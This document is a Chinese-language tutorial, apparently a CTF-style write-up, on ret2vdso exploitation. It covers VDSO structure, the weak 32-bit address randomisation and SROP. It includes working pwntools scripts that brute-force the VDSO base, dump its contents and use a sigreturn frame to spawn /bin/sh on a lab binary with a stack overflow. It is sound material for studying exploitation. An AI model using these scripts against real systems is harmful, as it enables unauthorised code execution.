ret2vdso Exploit 技术详解<\/h1>

1. 前导知识<\/h2>

1.1 VDSO 概述<\/h3>
VDSO (Virtual Dynamic Shared Object) 是 Linux 内核提供的一个机制，用于加速系统调用：<\/p>
传统 int 0x80<\/code> 系统调用较慢<\/li>
Intel 和 AMD 分别实现了 sysenter\/sysexit<\/code> 和 syscall\/sysret<\/code> 快速系统调用指令<\/li>
Linux 通过 vsyscall 机制统一接口，具体实现由内核决定<\/li>
VDSO 可以看作是一个特殊的 .so<\/code> 动态库，但不同内核版本内容不同<\/li>
<\/ul>
1.2 VDSO 内容分析<\/h3>
64位 VDSO (vdso_x64.so)<\/h4>
包含的函数：<\/p>
clock_gettime
gettimeofday
time
getcpu
<\/code><\/pre>
ROP 指令分析：<\/p>

仅有 62 条可用 gadget<\/li>
可利用的指令较少<\/li>
<\/ul>
32位 VDSO (vdso_x86.so)<\/h4>
包含的函数：<\/p>
__kernel_vsyscall
__vdso_gettimeofday
__kernel_sigreturn
__vdso_time
__kernel_rt_sigreturn
__vdso_clock_gettime
<\/code><\/pre>
ROP 指令分析：<\/p>

有 123 条 gadget<\/li>
包含 __kernel_rt_sigreturn<\/code> 可用于 SROP<\/li>
比 64 位有更多可利用指令<\/li>
<\/ul>
2. 利用思路<\/h2>
2.1 VDSO 随机化特点<\/h3>

相比于栈和其他 ASLR，VDSO 随机化较弱<\/li>
32 位系统有 1\/256 的命中概率<\/li>
地址范围在不同内核版本中不同：

较新内核：0xf7ed0000-0xf7fd0000<\/code><\/li>
旧内核：0xf76d9000-0xf77ce000<\/code><\/li>
<\/ul>
<\/li>
<\/ul>
2.2 利用步骤<\/h3>

泄露 VDSO<\/strong>：利用栈上的 VDSO 基地址指针<\/li>
利用 VDSO 进行 ROP<\/strong>：特别是 SROP 技术<\/li>
<\/ol>
3. 实例分析<\/h2>
3.1 目标程序分析<\/h3>
示例程序 ret2vdso.s<\/code> 反汇编后：<\/p>
int<\/span> main<\/span>() {
<\/span><\/span>  size_t size;
<\/span><\/span>  char<\/span> addr[128<\/span>];
<\/span><\/span>  
<\/span><\/span>  size =<\/span> read(0<\/span>, buf, 0x1000u<\/span>);
<\/span><\/span>  memcpy(addr, buf, size);
<\/span><\/span>  write(1<\/span>, addr, size);
<\/span><\/span>  return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>特点：<\/p>

明显的栈溢出漏洞<\/li>
非动态链接程序（not a dynamic executable<\/code>）<\/li>
自身 ROP gadget 极少（仅 36 条）<\/li>
<\/ul>
3.2 泄露 VDSO<\/h3>
使用格式化字符串泄露 VDSO 地址：<\/p>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    printf("vdso addr: %124$p<\/span>\n<\/span>"<\/span>);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>Python 脚本批量测试：<\/p>
import<\/span> os
<\/span><\/span>result =<\/span> []
<\/span><\/span>for<\/span> i in<\/span> range(100<\/span>):
<\/span><\/span>    result +=<\/span> [os.<\/span>popen('.\/vdso_addr'<\/span>).<\/span>read()[:-<\/span>1<\/span>]]
<\/span><\/span>result =<\/span> sorted(result)
<\/span><\/span>for<\/span> v in<\/span> result:
<\/span><\/span>    print(v)
<\/span><\/span><\/code><\/pre>3.3 读取 VDSO 内容<\/h3>
利用 write 函数读取 VDSO：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> random
<\/span><\/span>
<\/span><\/span>context(arch=<\/span>'i386'<\/span>, os=<\/span>'linux'<\/span>)
<\/span><\/span>elf =<\/span> ELF(".\/ret2vdso"<\/span>)
<\/span><\/span>
<\/span><\/span>RANGE_VDSO =<\/span> range(0xf7ed0000<\/span>, 0xf7fd0000<\/span>, 0x1000<\/span>)
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    try<\/span>:
<\/span><\/span>        sh =<\/span> process(".\/ret2vdso"<\/span>)
<\/span><\/span>        vdso_addr =<\/span> random.<\/span>choice(RANGE_VDSO)
<\/span><\/span>        
<\/span><\/span>        sh.<\/span>send('a'<\/span>*<\/span>132<\/span> +<\/span> 
<\/span><\/span>               p32(elf.<\/span>symbols['write'<\/span>]) +<\/span>
<\/span><\/span>               p32(0<\/span>) +<\/span>
<\/span><\/span>               p32(1<\/span>) +<\/span>          # fd<\/span>
<\/span><\/span>               p32(vdso_addr) +<\/span>   # buf<\/span>
<\/span><\/span>               p32(0x2000<\/span>)       # count<\/span>
<\/span><\/span>               )
<\/span><\/span>        
<\/span><\/span>        sh.<\/span>recvuntil(p32(0x2000<\/span>))
<\/span><\/span>        result =<\/span> sh.<\/span>recvall(0.1<\/span>)
<\/span><\/span>        if<\/span> len(result) !=<\/span> 0<\/span>:
<\/span><\/span>            open('vdso.so'<\/span>, 'wb'<\/span>).<\/span>write(result)
<\/span><\/span>            sh.<\/span>close()
<\/span><\/span>            log.<\/span>success("Success"<\/span>)
<\/span><\/span>            break<\/span>
<\/span><\/span>        sh.<\/span>close()
<\/span><\/span>    except<\/span>:
<\/span><\/span>        sh.<\/span>close()
<\/span><\/span><\/code><\/pre>3.4 SROP 利用<\/h3>
获取 shell 的完整脚本：<\/p>
from<\/span> pwn import<\/span> *<\/span>
<\/span><\/span>import<\/span> random
<\/span><\/span>
<\/span><\/span>context(arch=<\/span>'i386'<\/span>, os=<\/span>'linux'<\/span>)
<\/span><\/span>elf =<\/span> ELF(".\/ret2vdso"<\/span>)
<\/span><\/span>vdso =<\/span> ELF(".\/vdso.so"<\/span>)
<\/span><\/span>
<\/span><\/span># 设置 \/bin\/sh 字符串位置<\/span>
<\/span><\/span>str_bin_sh_offset =<\/span> 0x200<\/span>
<\/span><\/span>str_bin_sh_addr =<\/span> elf.<\/span>symbols['buf'<\/span>] +<\/span> str_bin_sh_offset
<\/span><\/span>int_0x80 =<\/span> 0x080480a5<\/span>  # 程序中的 int 0x80 gadget<\/span>
<\/span><\/span>
<\/span><\/span># 创建 SROP frame<\/span>
<\/span><\/span>frame =<\/span> SigreturnFrame(kernel=<\/span>'i386'<\/span>)
<\/span><\/span>frame.<\/span>eax =<\/span> constants.<\/span>SYS_execve
<\/span><\/span>frame.<\/span>ebx =<\/span> str_bin_sh_addr
<\/span><\/span>frame.<\/span>ecx =<\/span> 0<\/span>
<\/span><\/span>frame.<\/span>edx =<\/span> 0<\/span>
<\/span><\/span>frame.<\/span>eip =<\/span> int_0x80
<\/span><\/span>
<\/span><\/span># 必须设置的寄存器值<\/span>
<\/span><\/span>frame.<\/span>cs =<\/span> 35<\/span>   # 用户模式代码段选择子<\/span>
<\/span><\/span>frame.<\/span>ss =<\/span> 43<\/span>    # 用户模式堆栈段选择子<\/span>
<\/span><\/span>frame.<\/span>ds =<\/span> 43<\/span>    # 用户模式数据段选择子<\/span>
<\/span><\/span>frame.<\/span>es =<\/span> 43<\/span>    # 用户模式额外段选择子<\/span>
<\/span><\/span>frame.<\/span>gs =<\/span> 0<\/span>
<\/span><\/span>frame.<\/span>fs =<\/span> 0<\/span>
<\/span><\/span>
<\/span><\/span>RANGE_VDSO =<\/span> range(0xf7ed0000<\/span>, 0xf7fd0000<\/span>, 0x1000<\/span>)
<\/span><\/span>
<\/span><\/span>while<\/span> True<\/span>:
<\/span><\/span>    sh =<\/span> process(".\/ret2vdso"<\/span>)
<\/span><\/span>    vdso_addr =<\/span> random.<\/span>choice(RANGE_VDSO)
<\/span><\/span>    
<\/span><\/span>    # 构造 payload<\/span>
<\/span><\/span>    payload =<\/span> 'a'<\/span>*<\/span>128<\/span> +<\/span> p32(0<\/span>) +<\/span> \
<\/span><\/span>             p32(vdso_addr +<\/span> vdso.<\/span>symbols['__kernel_rt_sigreturn'<\/span>]) +<\/span> \
<\/span><\/span>             'c'<\/span> *<\/span> 40<\/span> *<\/span> 4<\/span> +<\/span> str(frame)
<\/span><\/span>    
<\/span><\/span>    payload =<\/span> payload.<\/span>ljust(str_bin_sh_offset, '<\/span>\x00<\/span>'<\/span>) +<\/span> '\/bin\/sh<\/span>\x00<\/span>'<\/span>
<\/span><\/span>    
<\/span><\/span>    sh.<\/span>send(payload)
<\/span><\/span>    sh.<\/span>recvuntil('\/bin\/sh<\/span>\x00<\/span>'<\/span>)
<\/span><\/span>    sh.<\/span>sendline('echo hello'<\/span>)
<\/span><\/span>    
<\/span><\/span>    try<\/span>:
<\/span><\/span>        result =<\/span> sh.<\/span>recv()
<\/span><\/span>        if<\/span> len(result) !=<\/span> 0<\/span>:
<\/span><\/span>            log.<\/span>success("Success"<\/span>)
<\/span><\/span>            sh.<\/span>interactive()
<\/span><\/span>            break<\/span>
<\/span><\/span>    except<\/span>:
<\/span><\/span>        pass<\/span>
<\/span><\/span>    sh.<\/span>close()
<\/span><\/span><\/code><\/pre>4. 关键注意事项<\/h2>


Frame 设置<\/strong>：<\/p>

32 位必须指定 kernel='i386'<\/code><\/li>
cs<\/code>, ds<\/code>, ss<\/code>, es<\/code> 等段寄存器必须正确设置<\/li>
错误设置会导致崩溃<\/li>
<\/ul>
<\/li>

接收数据<\/strong>：<\/p>

避免使用 recvall<\/code>，容易导致 EOFError<\/li>
即使成功获取 shell 也可能因此崩溃<\/li>
<\/ul>
<\/li>

Payload 构造<\/strong>：<\/p>

需要额外填充 160 字节 (40*4<\/code>)<\/li>
这是因为 __kernel_rt_sigreturn<\/code> 和 __kernel_sigreturn<\/code> 的区别<\/li>
使用 __kernel_sigreturn<\/code> 则不需要此填充<\/li>
<\/ul>
<\/li>

VDSO 差异<\/strong>：<\/p>

不同内核版本的 VDSO 内容不同<\/li>
必须从目标系统获取实际的 VDSO 文件<\/li>
<\/ul>
<\/li>
<\/ol>
5. 总结<\/h2>
ret2vdso 技术要点：<\/p>

利用 VDSO 较弱的随机化特性<\/li>
32 位系统成功率更高 (1\/256)<\/li>
需要先泄露 VDSO 内容<\/li>
利用 VDSO 中的 gadget 构造 ROP 链<\/li>
特别适合没有其他可用 gadget 的情况<\/li>
<\/ol>
该技术在以下场景特别有用：<\/p>

非动态链接程序<\/li>
程序自身 ROP gadget 极少<\/li>
无法利用 libc 的情况<\/li>
<\/ul>